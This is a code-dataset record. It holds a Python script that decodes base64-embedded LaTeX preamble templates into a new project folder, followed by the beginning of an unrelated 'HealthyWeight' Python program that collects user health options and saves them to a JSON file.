CgkJe3h9IAoJX3sgXGFyYWJpY3tpfSB9LAoJ\nXGRvdHMKCVxJZlZhbHVlVEYgeyMzfQoJCXsgLCAjMV97IzN9IH0KCQl7fQp9CgpcRGVjbGFyZURv\nY3VtZW50Q29tbWFuZCBcZXJvIHsgZyBnIH0gewkKCVxiZWdpbnthcnJheX17Y30KCQlcSWZWYWx1\nZVRGeyMxfQoJCQl7X3sjMX19CgkJCXtccGhhbnRvbXtcc2ltfX0KCVxcCgkJXHNpbQoJXFwKCQlc\nSWZWYWx1ZVRGeyMyfQoJCQl7XnsjMn19CgkJCXtccGhhbnRvbXtcc2ltfX0KCVxlbmR7YXJyYXl9\nCn0KClxEZWNsYXJlRG9jdW1lbnRDb21tYW5kIFxzZXQgeyBtIGcgfXsgCQkJCSUgXHNldHN7WH17\nQ30gPSB7IFggfCBDIH0KCSBcbGVmdFxsYnJhY2UKCSAJIzEgXElmVmFsdWVUIHsjMn0geyBcIHwg\nXCAgIzIgfQoJIFxyaWdodFxyYnJhY2UKfQoKXG1ha2VhdGxldHRlcgkJCQkJCQkJCQklIGFkZHMg\ndmVydGljYWwgbGluZXMgdG8gbWF0cmljZXMKXHJlbmV3Y29tbWFuZCpcZW52QG1hdHJpeFsxXVsq\nXGNATWF4TWF0cml4Q29scyBjXXsKICBcaHNraXAgLVxhcnJheWNvbHNlcAogIFxsZXRcQGlmbmV4\ndGNoYXJcbmV3QGlmbmV4dGNoYXIKICBcYXJyYXl7IzF9fQpcbWFrZWF0b3RoZXIKCiUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAgICBMb2dpYyBhbmQgcHJvb2ZzICAgICAgICAl\nCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCgolIFByb29mcwpcdXNlcGFja2FnZXth\nbXN0aG19CQkJCQkJCQklIFRoZW9yZW0gcGFja2FnZQpcdGhlb3JlbXN0eWxle2RlZmluaXRpb259\nCQkJCQkJJSBwbGFpbiwgZGVmaW5pdGlvbiwgcmVtYXJrCiVcc3dhcG51bWJlcnMJCQkJCQkJCQkl\nIElmIHlvdSB3YW50IHRvIGhhdmUgdGhlIG51bWJlciBmaXJzdAoKJSBMb2dpYyBwYWNrYWdlcwpc\ndXNlcGFja2FnZXtscGxmaXRjaH0JCQkJCQklIGZpdGNoIHN0eWxlIHByb29mcwoKJVx1c2VwYWNr\nYWdle2xvZ2ljcHJvb2Z9CQkJCQklIGFsdGVybmF0aXZlIHBhY2thZ2UsIHJlc2VtYmxpbmcgdGhl\nIGRCZXJMb2cgYm9vawolXHNldGxlbmd0aFxzdWJwcm9vZmhvcml6c3BhY2V7MmVtfQkJCSUgSW5k\nZW50IGZvciBzdWJwcm9vZnMuIENoYW5nZWQgZm9yIGZyZXNoIHZhcmlhYmxlcwoKCgolJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAgQ29sb3IgYW5kIHByZXNldHMgICAgICAg\nJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQoKJVx1c2VwYWNrYWdle3hjb2xvcn0J\nCQkJCQkJJSBiYXNpYyB4Y29sb3IgcGFja2FnZQpcdXNlcGFja2FnZVt0YWJsZSx4Y2RyYXdde3hj\nb2xvcn0JCQkJJSB4Y29sb3IgcGFja2FnZSB3aXRoIHN1cHBvcnQgZm9yIHRhYmxlcwpcZGVmaW5l\nY29sb3J7bHN0Q29tbWVudH17cmdifXswLjQ1LDAuNDUsMC40NX0JJSBjb2RlOiBjb21tZW50cyAo\nR3JleSkKXGRlZmluZWNvbG9ye2xzdEtleX17cmdifXswLjEzLDAuMjEsMX0JCQklIGNvZGU6IHBy\naW1hcnkga2V5d29yZHMgKEJsdWUpClxkZWZpbmVjb2xvcntsc3RLZXkyfXtyZ2J9ezEsMC42NjY2\nNjcsMC4xMzcyNn0gICUgY29kZTogc2Vjb25kYXJ5IGtleXdvcmRzIChEYXlbOV0gT3JhbmdlKQpc\nZGVmaW5lY29sb3J7bHN0U3RyaW5nfXtyZ2J9ezAuMSwwLjY1LDAuMX0JCSUgY29kZTogc3RyaW5n\ncyAoR3JlZW4pClxkZWZpbmVjb2xvcntsc3RCYXNlfXtyZ2J9ezAuMCwwLjAsMC4wfQkJCSUgY29k\nZTogYmFzZSAoQmxhY2spCgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAg\nICAgICAgICBUaWt6ICAgICAgICAgICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlCgpcdXNlcGFja2FnZXt0aWt6fQkJCQkJCQkJJSBpbXBvcnQgYmFzZXBhY2thZ2UKXHVzZXRp\na3psaWJyYXJ5e2NhbGN9CQkJCQkJCSUgQ29vcmRpbmF0ZSBjYWxjdWF0aW9ucwpcdXNldGlremxp\nYnJhcnl7cG9zaXRpb25pbmd9ICAgICAgICAgICAgICAgICAgICAlIFJlbGF0aXZlIHBvc2l0aW9u\naW5nClx1c2V0aWt6bGlicmFyeXtzaGFwZXN9ICAgICAgICAgICAgICAgICAgICAgICAgICUgRGVm\naW5pbmcgbm9kZXNoYXBlcyBhbmQgbW9yZSAoaXNhIGZvciBFL1IpCgolIFNpbXBsZSB0cmVlIG1h\nY3JvIHdpdGggY29tcGFiaWxpdHkgdG8gdGlregpcdXNlcGFja2FnZXt0aWt6LXF0cmVlfQkJCQkJ\nCQklIGltcG9ydCBzaW1wbGUgdHJlZSBtYWNybwpcdXNldGlremxpYnJhcnl7YXJyb3dzfSAgICAg\nICAgICAgICAgICAgICAgICAgICAlIGFycm93cyBmb3IgdHJlZXMKCiUgVGlreiBzZXR0aW5ncyBm\nb3IgcmVkLWJsYWNrIHRyZWVzClx0aWt6c2V0ewogIHRyZWVub2RlLy5zdHlsZSA9IHthbGlnbj1j\nZW50ZXIsIGlubmVyIHNlcD0wcHQsIHRleHQgY2VudGVyZWQsCiAgICBmb250PVxzZmZhbWlseX0s\nCiAgYXJuX2IvLnN0eWxlID0ge3RyZWVub2RlLCBjaXJjbGUsIHdoaXRlLCBmb250PVxzZmZhbWls\neVxiZnNlcmllcywgZHJhdz1ibGFjaywKICAgIGZpbGw9YmxhY2ssIHRleHQgd2lkdGg9MS41ZW19\nLCAgICAgICAgICAgICAgJSBibGFjayBub2RlCiAgYXJuX3IvLnN0eWxlID0ge3RyZWVub2RlLCBj\naXJjbGUsIHdoaXRlLCBmb250PVxzZmZhbWlseVxiZnNlcmllcywgZHJhdz1yZWQsCiAgICBmaWxs\nPXJlZCwgdGV4dCB3aWR0aD0xLjVlbX0sICAgICAgICAgICAgICAlIHJlZCBub2RlCiAgYXJuX3gv\nLnN0eWxlID0ge3RyZWVub2RlLCByZWN0YW5nbGUsIGRyYXc9YmxhY2ssIGZpbGw9YmxhY2ssCiAg\nICBtaW5pbXVtIHdpZHRoPTAuNWVtLCBtaW5pbXVtIGhlaWdodD0wLjVlbX0gICUgbmlsIG5vZGUK\nfQoKJSBUaWt6IEF1dG9tb3RhIGZvciBUdXJpbmcgTWFjaGluZXMKXHVzZXRpa3psaWJyYXJ5e2F1\ndG9tYXRhfQoKJSBUaWt6IEUvUiBkaWFncmFtClx1c2V0aWt6bGlicmFyeXtlcn0KCiUgR3JhcGhp\nY3MgYW5kIHBsb3RzClx1c2VwYWNrYWdle2dyYXBoaWN4fQkJCQkJCQklIGltcG9ydCBiYXNlcGFj\na2FnZSBmb3IgZ3JhcGhzClx1c2VwYWNrYWdle3BnZnBsb3RzfQkJCQkJCQklIGltcG9ydCBwZ2Zw\nbG90cwpcdXNlcGdmcGxvdHNsaWJyYXJ5e2ZpbGxiZXR3ZWVufQkJCQklIGFkZCBmaWxsQmV0d2Vl\nbiBjb21tYW5kClxwZ2ZwbG90c3NldHtjb21wYXQ9MS4xMH0JCQkJCQklIGNob29zZSB2ZXJzaW9u\nIG9mIHBnZnBsb3RzCgolIE1hY3JvIGZvciBjaXJjbGUgd2l0aCBzeW1ib2wgaW5zaWRlLgpcbmV3\nY29tbWFuZCpcY2lyY2xlZFsxXXsgXHRpa3pbYmFzZWxpbmU9KEMuYmFzZSldXG5vZGVbZHJhdyxj\naXJjbGUsaW5uZXIgc2VwPTAuNXB0XShDKSB7IzF9O1whfQoKCgolJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJQolICAgICAgICAgICAgQ29kZSAgICAgICAgICAgICAgJQolJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQpcbmV3Y29tbWFuZHtcY29kZX1bMV17e1xzZiAjMX19CQkJ\nCQklIFxjb2Rle1h9IHdyaXRlcyBYIGluIGEgY29kZS1hcHByb3ByaWF0ZSBmb250CgoKCgolJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAgICAgbHN0bGlzdGluZyAgICAgICAg\nICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQoKJSBJbXBvcnQgbHN0bGlzdGlu\nZ3MgLSBiZWF1dGlmdWwgc291cmNlY29kZSEKXHVzZXBhY2thZ2V7bGlzdGluZ3N9CgoKJSBDdXN0\nb20gbGFuZ3VhZ2UgZGVmaW5pdGlvbnMKJSBEZWZpbml0aW9uIG9mIFBzZXVkb2NvZGUKXGxzdGRl\nZmluZWxhbmd1YWdle3BzZXVkb2NvZGV9ewogIGtleXdvcmRzPVsxXXsKICAJICAgICBieSwgYnks\nIGRvd250bywgZWxzZSwgZXJyb3IsIGZvciwgaWYsIHJlcGVhdCwgcmV0dXJuLCB0bywgdW50aWws\nIHdoaWxlLCB3aGlsZQogIAl9LAkJCQkJCQkJICAgIAkJJSBsaXN0IG9mIGtleXdvcmRzLCBmaXJz\ndCBhbmQgbGFzdCBhcmUgbm90IHVzZWQKICBrZXl3b3Jkcz1bMl17CiAgICAgICAgYW5kLCBhbmQs\nIG9yLCBOSUwsIE5JTAogIH0KICBzZW5zaXRpdmU9ZmFsc2UsCQkJCQkJCQklIGtleXdvcmRzIGFy\nZSBub3QgY2FzZS1zZW5zaXRpdmUKICBtb3JlY29tbWVudD1bbF17Ly99LAkJCQkJCQklIGwgaXMg\nZm9yIGxpbmUgY29tbWVudAogIG1vcmVjb21tZW50PVtzXXsvKn17Ki99LAkJCQkJCSUgcyBpcyBm\nb3Igc3RhcnQgYW5kIGVuZCBkZWxpbWl0ZXIKICBtb3Jlc3RyaW5nPVtiXSIJCQkJCQkJCSUgc3Ry\naW5ncyBhcmUgZW5jbG9zZWQgaW4gZG91YmxlIHF1b3Rlcwp9CgoKJSBTZXR0aW5ncyBmb3IgbHN0\nbGlzdGluZ3MKXGxzdHNldHtsYW5ndWFnZT1wc2V1ZG9jb2RlLAkJCQkJJSBjaG9vc2UgbGFuZ3Vh\nZ2UKICBjb2x1bW5zPWZsZXhpYmxlLAkJCQkJCQkJJSBsZXQgdGhlIGJveCBhbGlnbiB0byB0aGUg\nd2lkdGggb2YgdGhlIHBhZ2UKICBicmVha2xpbmVzPXRydWUsCQkJCQkJCQklIGF1dG9tYXRpY2Fs\nbHkgYnJlYWsgbGluZXMKICBicmVha2F0d2hpdGVzcGFjZT10cnVlLAkJCQkJCSUgYXV0b21hdGlj\nYWxseSBicmVhayBzaG91bGQgdGhlcmUgb25seSBiZSB3aGl0ZSBzcGFjZS4KICBudW1iZXJzPWxl\nZnQsCQkJCQkJCQkJJSBudW1iZXJpbmc6IG5vbmUsIGxlZnQsIHJpZ2h0CiAgbnVtYmVyc2VwPTVw\ndCwJCQkJCQkJCSUgZGlzdGFuY2UgYmV0d2VlbiBsaW5lbnVtYmVycyBhbmQgY29kZQogIG51bWJl\ncnN0eWxlPVxjb2xvcntsc3RDb21tZW50fSwJCQkJJSBjaGFuZ2Ugc3R5bGUgb2YgbnVtYmVyaW5n\nIC0gY3VycmVudGx5IGdyZXkuCiAgc3RlcG51bWJlcj0xLAkJCQkJCQkJCSUgc3RlcCBiZXR3ZWVu\nIHRvIGxpbmUtbnVtYmVycy4gMSA9IGVhY2ggbGluZSBpcyBudW1iZXJlZAogIHNob3dzcGFjZXM9\nZmFsc2UsCQkJCQkJCQklIHNob3cgc3BhY2VzIGV2ZXJ5d2hlcmUgLSBhZGRpbmcgcGFydGljdWxh\nciB1bmRlcnNjb3JlcwogIHNob3dzdHJpbmdzcGFjZXM9ZmFsc2UsCQkJCQkJJSB1bmRlcmxpbmUg\nc3BhY2VzIHdpdGhpbiBzdHJpbmdzIG9ubHkuCiAgc2hvd3RhYnM9ZmFsc2UsCQkJCQkJCQklIHNo\nb3cgdGFicyB3aXRoaW4gc3RyaW5ncyBhZGRpbmcgcGFydGljdWxhciB1bmRlcnNjb3Jlcy4KICBl\nc2NhcGVpbnNpZGU9eypAfXtAKn0sICAgICAgICAgICAgICAgIAkJJSBpZiB5b3Ugd2FudCB0byBh\nZGQgTGFUZVggd2l0aGluIHlvdXIgY29kZQogIGJhc2ljc3R5bGU9XHR0ZmFtaWx5IFxjb2xvcnts\nc3RCYXNlfSwJCQklIHNldCBiYXNpYyBjb2xvcgogIGNvbW1lbnRzdHlsZT1cY29sb3J7bHN0Q29t\nbWVudH0sCQkJCSUgc2V0IGNvbG9yIG9mIGNvbW1lbnRzCiAga2V5d29yZHN0eWxlPVsxXVxjb2xv\ncntsc3RLZXl9LAkJCQklIHNldCBjb2xvciBvZiBwcmltYXJ5IGtleXdvcmRzCiAga2V5d29yZHN0\neWxlPVsyXVxjb2xvcntsc3RLZXkyfSwJCQkJJSBzZXQgY29sb3Igb2Ygc2Vjb25kYXJ5IGtleXdv\ncmRzCiAgc3RyaW5nc3R5bGU9XGNvbG9ye2xzdFN0cmluZ30sCQkJCSUgc2V0IGNvbG9yIG9mIHN0\ncmluZ3MKfQoKJSBsc3RsaXN0aW5nIC0gUHV0IGl0IGJlYXV0aWZ1bGx5IGluIHRoZSBtaWRkbGUK\nXGxzdHNldHt4bGVmdG1hcmdpbj0gLjFcdGV4dHdpZHRoICwgICAgIAkJCQkJCQklIGxlZnRtYXJn\naW4gYmVpbmcgMTAlIG9mIHRoZSBjdXJyZW50IHdpZHRoCiAgeHJpZ2h0bWFyZ2luPSAuMVx0ZXh0\nd2lkdGgsICAgICAgICAgICAJCQkJCQkJJSByaWdodCBtYXJnaW4gYWxzbyAxMCUKICBmcmFtZT1i\nb3R0b21saW5lICAgICAgICAgICAgICAgICAgICAgIAkJCQkJCQklIERyYXcgYSBsaW5lIG9uIHRo\nZSBib3R0b20gb2YgdGhlIHN1cnJvdW5kaW5nIGJveAp9CgolIGxzdGxpc3RpbmcgaGVhZGVyClxE\nZWNsYXJlQ2FwdGlvbkZvbnR7d2hpdGV9e1xjb2xvcnt3aGl0ZX19ICAgICAgICAgICAgICAgICAg\nICAgICAgICAgICAgICAgICAgICAgJSBmb250c3R5bGUgb2YgY2FwdGlvbgpcRGVjbGFyZUNhcHRp\nb25Gb3JtYXR7bGlzdGluZ317XGNvbG9yYm94e2dyYXl9e1xwYXJib3h7XGxpbmV3aWR0aH17IzEj\nMiMzfX19ICAgICUgY3JlYXRlIG5pY2UgZ3JleSBib3hlcyBmb3IgY2FwdGlvbnMKXGNhcHRpb25z\nZXR1cFtsc3RsaXN0aW5nXXtmb3JtYXQ9bGlzdGluZyxsYWJlbGZvbnQ9d2hpdGUsdGV4dGZvbnQ9\nd2hpdGV9ICAgICAgICAlIGFwcGx5IHNldHRpbmdzIHRvIGxpc3RpbmcKCgolJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgIFRpdGxlIGFuZCBpbmZvcm1hdGlvbiAgICAg\nICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQpcc2V0dmFsdWV7dGl0bGUg\nPSBLZWVwIENhbG0gYW5kIFx0ZXh0YmFja3NsYXNoIHNldHRpdGxlfQpcc2V0dmFsdWV7c3VidGl0\nbGUgPSB9CgpcRGVjbGFyZURvY3VtZW50Q29tbWFuZCBcc2V0dGl0bGUgeyBtIGcgfXsgCQkJCSUg\nXHNldFRpdGxle3RpdGxlfXtzdWJ0aXRsZX0KCSBcc2V0dmFsdWV7dGl0bGUgPSBcaHVnZSAjMX0K\nCSBcSWZWYWx1ZVQgeyMyfSB7IFxzZXR2YWx1ZXtzdWJ0aXRsZSA9IFxcIFxsYXJnZSAjMn0gfQp9\nCgpcc2V0dmFsdWV7bmFtZSA9IH0KXHNldHZhbHVle2VtYWlsID0gfQpcc2V0dmFsdWV7aWQgPSB9\nCgpcRGVjbGFyZURvY3VtZW50Q29tbWFuZCBcYWRkYXV0aCB7IG0gZyBnIH17IAkJCSUgXHNldEF1\ndGh7bmFtZX17ZW1haWx9e2lkfQoJIFxzZXR2YWx1ZXtuYW1lID0gIzF9CgkgXGF1dGhvcnsjMX0K\nCSBcSWZWYWx1ZVQgeyMyfSB7CgkgCVxzZXR2YWx1ZXtlbWFpbCA9ICMyfQoJIAlcYWZmaWx7XHBy\nb3RlY3RcaHJlZnttYWlsdG86IzJ9eyMyfX0KCSB9CgkgXElmVmFsdWVUIHsjM30gewoJIAlcc2V0\ndmFsdWV7aWQgPSAjM30KCSB9Cn0KClx0aXRsZXtcZ2V0dmFsdWV7dGl0bGV9IFxnZXR2YWx1ZXtz\ndWJ0aXRsZX19CgpcZGF0ZXtcdG9kYXl9Cgpcc2V0dmFsdWV7b2YgPSBvZn0KClxsaGVhZHtccHJv\ndGVjdFxocmVme1xnZXR2YWx1ZXtlbWFpbH19e1xnZXR2YWx1ZXtuYW1lfVxnZXR2YWx1ZXtpZH19\nfQpcY2hlYWR7fQpccmhlYWR7XEBjdXJyZW50bGFiZWxuYW1lXCB8IFx0aGVwYWdlXCBcZ2V0dmFs\ndWV7b2Z9IFxwYWdlcmVme0xhc3RQYWdlfX0KCiVcbGZvb3R7fQolXGNmb290e30KJVxyZm9vdHt9\nCg==\n\"\"\"\npreamble_en = \"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSBTZXR0aW5ncyBmb3IgZG9jdW1l\nbnQgKGVuZ2xpc2gpICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgSW5w\ndXQgY29tbW9uIGRlZmluaXRpb24KXGlucHV0e3ByZWFtYmxlX2Jhc2UudGV4fQoKCiUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICBFbmNvZGluZyBhbmQgaHlwaGVuYXRpb24gICAl\nCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgQmFzaWNzOiBmb250LCBjb2RlYyBl\ndGMuClx1c2VwYWNrYWdlW2VuZ2xpc2hde2JhYmVsfQkJCQkJCSUgYmFiZWwgaXMgZm9yIGh5cGhl\nbmF0aW9uIGFuZCBvdGhlciBnb29kaWVzCgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlCiUgICAgICAgICBsc3RsaXN0aW5nICAgICAgICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlClxyZW5ld2NvbW1hbmR7XGxzdGxpc3RpbmduYW1lfXtDb2RlfSAgICAgICAg\nICAgICAgJSBmb3Igb25lIGJsb2NrIG9mIGNvZGUgYWxvbmUKXHJlbmV3Y29tbWFuZHtcbHN0bGlz\ndGxpc3RpbmduYW1lfXtMaXN0IG9mIGNvZGV9ICAlIGZvciBtb3JlIHBpZWNlcyBvZiBjb2RlIGlu\nIG9uZQoKCgolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolICAgICAgTG9naWMgYW5k\nIHByb29mcyAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolIFRoZW9y\nZW0gZW52aXJvbm1lbnRzClxuZXd0aGVvcmVte3RoZW9yZW19e1RoZW9yZW19W3NlY3Rpb25dClxu\nZXd0aGVvcmVte2xlbW1hfXtMZW1tYX1bc2VjdGlvbl0KXG5ld3RoZW9yZW17cHJvcG9zaXRpb259\ne1Byb3Bvc2l0aW9ufVtzZWN0aW9uXQpcbmV3dGhlb3JlbXtjb3JvbGxhcnl9e0Nvcm9sbGFyeX1b\nc2VjdGlvbl0KXG5ld3RoZW9yZW17ZGVmaW5pdGlvbn17RGVmaW5pdGlvbn1bc2VjdGlvbl0KXG5l\nd3RoZW9yZW17Y29uamVjdHVyZX17Q29uamVjdHVyZX1bc2VjdGlvbl0KXHJlbmV3Y29tbWFuZCp7\nXHByb29mbmFtZX17UHJvb2Z9CgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUg\nICAgICBFeGFtcGxlIGVudmlyb25tZW50ICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlClxuZXd0aGVvcmVte2V4YW1wbGV9e0V4YW1wbGV9W3NlY3Rpb25d\n\"\"\"\npreamble_dk = \"\"\"JSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJQolIFNldHRpbmdzIGZvciBkb2N1bWVu\ndCAoZGFuaXNoKSAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgSW5wdXQg\nY29tbW9uIGRlZmluaXRpb24KXGlucHV0e3ByZWFtYmxlX2Jhc2UudGV4fQoKJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgIEVuY29kaW5nIGFuZCBoeXBoZW5hdGlvbiAgICUKJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSBCYXNpY3M6IGZvbnQsIGNvZGVjIGV0Yy4K\nXHVzZXBhY2thZ2VbZGFuaXNoXXtiYWJlbH0JCQkJCQklIGJhYmVsIGlzIGZvciBoeXBoZW5hdGlv\nbiBhbmQgb3RoZXIgZ29vZGllcwpccmVuZXdjb21tYW5ke1xkYW5pc2hoeXBoZW5taW5zfXsyMn0J\nCQklIGV2ZW4gYmV0dGVyIGRhbmlzaCBoeXBoZW5hdGlvbiEKCiUgLmJpYiBkYW5pc2ggcmVkZWZp\nbml0aW9uIGZvciBhdXRob3IgaW4gdGl0bGUKXHJlbmV3Y29tbWFuZFxBdXRoYW5keyBvZyB9Clxy\nZW5ld2NvbW1hbmRcQXV0aGFuZHN7LCBvZyB9ClxyZW5ld2NvbW1hbmRcQWZmaWxmb250e1xzbWFs\nbH0KCgoKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKJSAgICAgICAgIGxzdGxpc3Rp\nbmcgICAgICAgICAgICUKJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKCiUgbHN0bGlz\ndGluZyBsYW5ndWFnZSByZWRlZmluaXRpb25zClxyZW5ld2NvbW1hbmR7XGxzdGxpc3RpbmduYW1l\nfXtLb2RlfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJSBmb3Ig\nb25lIGJsb2NrIG9mIGNvZGUgYWxvbmUKXHJlbmV3Y29tbWFuZHtcbHN0bGlzdGxpc3RpbmduYW1l\nfXtMaXN0ZSBhZiBcbHN0bGlzdGluZ25hbWUgcn0gICAgICAgICAgICAgICAgICAlIGZvciBtb3Jl\nIHBpZWNlcyBvZiBjb2RlIGluIG9uZQoKCgolJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJQolICAgICAgTG9naWMgYW5kIHByb29mcyAgICAgICAgJQolJSUlJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJQolIFRoZW9yZW0gZW52aXJvbm1lbnRzClxuZXd0aGVvcmVte3RoZW9yZW19e1PD\npnRuaW5nfVtzZWN0aW9uXQpcbmV3dGhlb3JlbXtsZW1tYX17TGVtbWF9W3NlY3Rpb25dClxuZXd0\naGVvcmVte3Byb3Bvc2l0aW9ufXtQcm9wb3NpdGlvbn1bc2VjdGlvbl0KXG5ld3RoZW9yZW17Y29y\nb2xsYXJ5fXtLb3JvbGxhcn1bc2VjdGlvbl0KXG5ld3RoZW9yZW17ZGVmaW5pdGlvbn17RGVmaW5p\ndGlvbn1bc2VjdGlvbl0KXG5ld3RoZW9yZW17Y29uamVjdHVyZX17Rm9ybW9kbmluZ31bc2VjdGlv\nbl0KXHJlbmV3Y29tbWFuZCp7XHByb29mbmFtZX17QmV2aXN9CgoKJSUlJSUlJSUlJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUKJSAgICAgIEV4YW1wbGUgZW52aXJvbm1lbnQgICAgICUKJSUlJSUlJSUl\nJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUKXG5ld3RoZW9yZW17ZXhhbXBsZX17RWtzZW1wZWx9W3Nl\nY3Rpb25dCgoKCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlCiUgICAgICAgVGl0bGUg\nYW5kIGxheW91dCAgICAgICAlCiUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlJSUlClxzZXR2\nYWx1ZXtvZiA9IGFmfQo=\n\"\"\"\n\n \nparser = argparse.ArgumentParser(description='Make a LaTeX project from Steffan\\'s awesome template')\nparser.add_argument('path', type=str, nargs='+', help='the path to build the project')\nparser.add_argument('-l', type=str, nargs=1, help='the language of the preamble, \"en\" or \"dk\"', default=[\"en\"])\nparser.add_argument('--zip', dest='zip', action='store_const', const=True, default=False, help='zip the resulting project')\n#TODO: Add -c option to clean folders first / after\nargs = parser.parse_args()\n\npreamble_locale = 'preamble_dk' if args.l[0] == 'dk' else 'preamble_en'\npreamble_l_content = preamble_dk if args.l[0] == 'dk' else preamble_en\npreamble_l_content = base64.decodestring( preamble_l_content )\npreamble_base_content = base64.decodestring( preamble_base )\ntemplate_content = base64.decodestring( template )\n\n#TODO: make this specifiable in the prepare.py\n######## MODIFICATIONS ########\n\ntemplate_content = template_content.replace( '\\subimport{../preamble/}{preamble_en.tex}',\n'\\subimport{preamble/}{' + preamble_locale + '.tex}')\n\n###############################\n\nPATH = \" \".join(args.path)\nif not os.path.exists(PATH):\n os.makedirs(PATH)\nos.chdir(PATH)\nif not os.path.exists('preamble'):\n os.mkdir('preamble')\nwith open(os.path.join('preamble', preamble_locale + '.tex'), 'w') as preamble_l_file:\n preamble_l_file.write(preamble_l_content)\n\nwith open(os.path.join('preamble', 'preamble_base.tex'), 'w') as preamble_base_file:\n preamble_base_file.write(preamble_base_content)\n\nwith open('template.tex', 'w') as template_file:\n template_file.write(template_content)\n\nif args.zip:\n fname = os.getcwd() #includes the filepath, sice we cd'ed to it\n import zipfile\n zipf = zipfile.ZipFile(fname + '.zip', 'w', zipfile.ZIP_DEFLATED)\n zipf.write(os.path.join('preamble', preamble_locale + '.tex'))\n zipf.write(os.path.join('preamble', 'preamble_base.tex'))\n zipf.write('template.tex')\n zipf.close()\nraw_input('Success, Press enter to exit')\n"
}
] | 1 |
shantaladajian/HealthyWeight
|
https://github.com/shantaladajian/HealthyWeight
|
184e41d6dba63fb1277946e2b1a096d4bb7f3646
|
96f0c34ea073be3e11184b3ac9f2dc96b763a70f
|
c1a279a3231da45a441002064db35bf9a19cf0d8
|
refs/heads/master
| 2020-04-30T21:40:31.869107 | 2019-05-16T04:36:59 | 2019-05-16T04:36:59 | 177,099,066 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.549699068069458,
"alphanum_fraction": 0.5583625435829163,
"avg_line_length": 43.172515869140625,
"blob_id": "3ecb804db0cd11e477ddcefbb0a08477db386a26",
"content_id": "b76c8b64bfaf82900e933c0350f04f9cf8a4591f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15121,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 342,
"path": "/main.py",
"repo_name": "shantaladajian/HealthyWeight",
"src_encoding": "UTF-8",
"text": "import json\nimport os\nimport random\n\ndef loadOptions():\n with open('datas.json', 'r') as file:\n datas = json.load(file)\n\n user_options = datas[\"dataOptions\"]\n return user_options\n\n\ndef AskForDataOptions(data):\n print(\"\\nDear User, you're going to answer for the following : \", (\" , \").join(data.keys()))\n x = input(\"\\nDear user, please create a username by typing it in directly :\")\n options = {x: {\"dataOptions\": {}}}\n\n for key in data:\n while True:\n datas = tuple(data[key])\n print(\"\\nFor your \" + key + \" answer 0 for \" + datas[0] + \" , answer 1 for \" + datas[1])\n if len(datas) > 2:\n print(\"answer 2 for \" + datas[2])\n p = input(\"\\nyour\" + key + \"is : \")\n if (p.isnumeric()):\n p = int(p)\n if p < 3 and p > -1:\n options[x][\"dataOptions\"][key] = datas[p]\n break\n else:\n print(\"\\nplease try again. Answer in the form of the integers mentioned above. \\n\")\n else:\n print(\"\\nplease try again. Answer in the form of the INTEGERS mentioned above. \\n\")\n return x, options\n\n\ndef SaveOptions(options):\n a = os.listdir()\n if \"users.json\" in a:\n with open('users.json') as file1:\n initialold = json.load(file1)\n initialold.update(options)\n file = open('users.json', 'w')\n file.write(json.dumps(initialold))\n file.close()\n else:\n file = open(\"users.json\", \"w\")\n file.write(json.dumps(options))\n file.close()\n\n\ndef AskForinitialData(x):\n a = open(\"users.json\", \"r\")\n dataOptions = json.load(a)\n if dataOptions[x]['dataOptions'][\"healthCondition\"] == \"bad\":\n print(\"\\nWARNING: Dear user,because of your bad health condition, please consult your doctor before following our plan. 